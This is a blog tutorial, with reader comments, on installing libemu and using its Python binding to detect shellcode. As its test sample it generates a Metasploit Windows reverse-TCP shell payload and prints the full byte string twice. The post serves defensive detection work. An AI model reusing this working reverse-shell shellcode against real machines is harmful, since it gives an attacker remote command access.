Shellcode detection using libemu

Shellcode can be seen as a list of instructions that has been developed in a manner that allows it to be injected in an application during runtime. Each security researcher face the shellcodes during their work, and in this article I'll show how to detect shellcodes using Python (via libemu Python binding).

Few words about libemu:
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. Intended use is within network intrusion/prevention detections and honeypots.
The information on the site is not actual in some places, so I'll give direct and clear instruction how to get and install libemu.

Clone the git repository:

$ git clone git://git.carnivore.it/libemu.git

Firstly, configure, make and install libemu itself (without binding):

$ autoreconf -v -i
$ ./configure --prefix=/opt/libemu
$ make
$ sudo make install

If you set up prefix as shown above, you have to add the library path to /etc/ld.so.conf file. It should looks like:

include /etc/ld.so.conf.d/*.conf
/opt/libemu/lib

After that, update the linker run-time database:

$ sudo ldconfig

Now it's time to build python bindings (the configure is not complete, so some configuring must be done by hands):

$ ./configure –prefix=/opt/libemu/ –enable-python-bindings
$ cp bindings/python/setup.py bindings/python/setup.py.orig
$ sed -e 's/${prefix}/\/opt\/libemu/' bindings/python/setup.py > bindings/python/setup.py.tmp
$ sed -e 's/${exec_prefix}/\/opt\/libemu/' bindings/python/setup.py.tmp > bindings/python/setup.py
$ rm -f binfings/python/setup.py.tmp
$ make
$ sudo make install

That's all - Python binding is ready. Let's test sample string:


$ python
Python 2.6.6 (r266:84292, Sep 15 2010, 16:22:56)
[GCC 4.4.5] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import libemu
>>> emulator = libemu.Emulator()
>>> emulator.test("hello world!")
>>>

As you can see, for innocent string emulator test (emu_shellcode_test function in C) returns nothing.

Now let's take some real shellcode from Metasploit. It's pretty easy - some payloads in MSF are provided as shellcodes, so we have to only generate its source code:


msf > use windows/shell_reverse_tcp
msf payload(shell_reverse_tcp) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf payload(shell_reverse_tcp) > generate -t ruby
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# LHOST=0.0.0.0, LPORT=4444, ReverseConnectRetries=5, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\x00\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
Unfortunately, MSF can't generate source code in Python, so we'll insert Ruby expression in round brackets:


>>> shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
... "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
... "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
... "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
... "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
... "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
... "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
... "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
... "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
... "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
... "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
... "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
... "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
... "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
... "\x00\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56" +
... "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
... "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
... "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
... "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
... "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
... "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
... "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
... "\x6f\x6a\x00\x53\xff\xd5")
>>> emulator.test(shellcode)
-4657153
The result is the offset within the buffer where the shellcode is suspected. See the emu_shellcode_test reference.

So, as you see, libemu is useful library, and should not be underestimated. Besides shellcode detection it can be used for various emulations, and it is extensively used in various security research project. Don't miss you chance, and use it too. Good luck!

Comments

  1. Hi, I tried in vain to have a Windows version of Libemu. :( Would you please help me?

    ReplyDelete
  2. AFAIK, the Windows version of Libemu doesn't exist. However, there are some way to get or use it:
    - compile it in Windows using cygwin or mingw;
    - compile it in Linux for Windows using cross-compilation libraries like mingw;
    - use coLinux or some VM to run Linux software in Windows;
    - rewrite some parts of the Libemu to support building by native Windows compilers.

    I assume it can help you to understand the directions you can move. If you need further assistance let me know.

    ReplyDelete
  3. Hi there,
    We can use Malzilla and use the shellcode analyzer in there (they use libemu for shellcode detection and emulation).

    ReplyDelete
  4. Are you sure? I've taken a brief look to its sources (Pascal, probably, Delphi, oh, horror :) ) and have not find any references to libemu.

    ReplyDelete
  5. @Alexander: I've used cywin to build libemu. I followed compiling instructions found in README file. But an error's spawn when I issued the configure command. Below is what cywin gave to me. :((

    ./configure --prefix=/opt/libemu
    ....
    checking cargos-lib.h usability... no
    checking cargos-lib.h presence... no
    checking for cargos-lib.h... no
    configure: creating ./config.status
    .in'ig.status: error: cannot find input file: `Makefile


    --> Any idea?

    ReplyDelete
  6. Have your autoreconf command been successful? I've just tested - I can configure libemu without any problems using Cygwin. Just don't forget to install the packages below and all its dependencies:
    - gcc;
    - make;
    - automake;
    - libtool;
    - gettext-devel.

    However, make command fails with default Cygwin GCC installation due to its out-dated nature. You can try to update the GCC: http://cygwin.wikia.com/wiki/How_to_install_GCC_4.3.0

    ReplyDelete
  7. I've switched to use Mingw instead. Everything seemed to be going fine. But when I issued "make install", another error appeared:

    "emu.c:44:2: error: function declaration isn't a prototype
    emu.c:44:7: error: field '_errno' declared as a function
    emu.c: In function 'emu_errno_set':
    emu.c:100:5: error: expected identifier before '(' token
    emu.c: In function 'emu_errno':
    emu.c:105:12: error: expected identifier before '(' token
    emu.c: In function 'emu_strerror_set':
    emu.c:116:2: error: implicit declaration of function 'vasprintf'
    emu.c: In function 'emu_errno':
    emu.c:106:1: error: control reaches end of non-void function
    make[2]: *** [emu.lo] Error 1
    make[2]: Leaving directory `/libemu/src'
    make[1]: *** [install-recursive] Error 1
    make[1]: Leaving directory `/libemu/src'
    make: *** [install-recursive] Error 1"

    Consequently, I took a glance at emu.c to see what's wrong with it.

    struct emu
    {
    struct emu_logging *log;
    struct emu_memory *memory;
    struct emu_cpu *cpu;
    int errno; // line 44
    char *errorstr;
    };

    I couldn't find anything suspicious. So what's going on here?

    ReplyDelete
  8. Would you please give me a pre-built version of libemu?

    ReplyDelete
  9. I don't have any pre-built version of libemu for Windows. I frankly doubt that using Windows for security research is a good idea, and assume that libemu developers think the same.

    However, I'll take a look to mingw error a little bit later. There is nothing wrong with emu struct, it looks like the problem is in the usage of standard headers (e.g., maybe errno.h is not included in emu.c).

    ReplyDelete
  10. Well, apparently libemu uses GNU extensions, so you can't just compile it for Windows without any modifications. For example, vasprintf function is not provided by MinGW (nor direct compilation in Windows neither cross-compilation in Linux won't work).

    So if you insist on Windows version of LibEMU, you have to rewrite some parts of its code. Looks like OpenDUNE developers are also doing it, you can try their version: http://wiki.opendune.org/Development/Windows

    ReplyDelete
  11. Thanks for your patience. It's very kind of you to give me such good advices. Somehow I managed to build libemu successfully by using cygwin. After compiling, in the output folder (c:\cygwin\opt\libemu\lib\), I saw the following files:

    libemu.a
    libemu.dll.a
    libemu.la
    emu.o

    How can I get a DLL file?

    ReplyDelete
  12. Try to search it in another directories. As you can see (libtool: What .la file is for?), the dll file should be somewhere, and probably not in "lib" dir.

    ReplyDelete
  13. OMG, at last I've got it! :D Thank you very much!

    ReplyDelete
  14. Nice post, however there is enough reasons not to rely on libemu: http://2011.6.20.libemu-fnstenv-no-detection.blog.oxff.net/

    ReplyDelete
  15. Thanks, we'll give libscizzle a try :) Libemu is indeed not perfect, but we use it only as a auxiliary tool, actual shellcodes are detected and analysed by other tools.

    ReplyDelete
  16. is there actually negative offset?

    ReplyDelete
  17. I've posted an actual result. Of course, it looks suspicious, so I would not trust the result itself, and only use a condition "!= -1" as a criterion for the potential malware.

    ReplyDelete
  18. So when you come across a negative offset with Libemu, do you flag it as shellcode?

    ReplyDelete
  19. Use Nemu instead of Libemu. Libemu has very limited heuristics to detect shellcode.

    ReplyDelete
    Replies
    1. Probably, but brief search shows that it's a closed prototype. If it's available in a public domain, please provide a link.

      Delete

Post a Comment

Popular posts from this blog

Web application framework comparison by memory consumption

Trac Ticket Workflow

Python vs JS vs PHP for embedded systems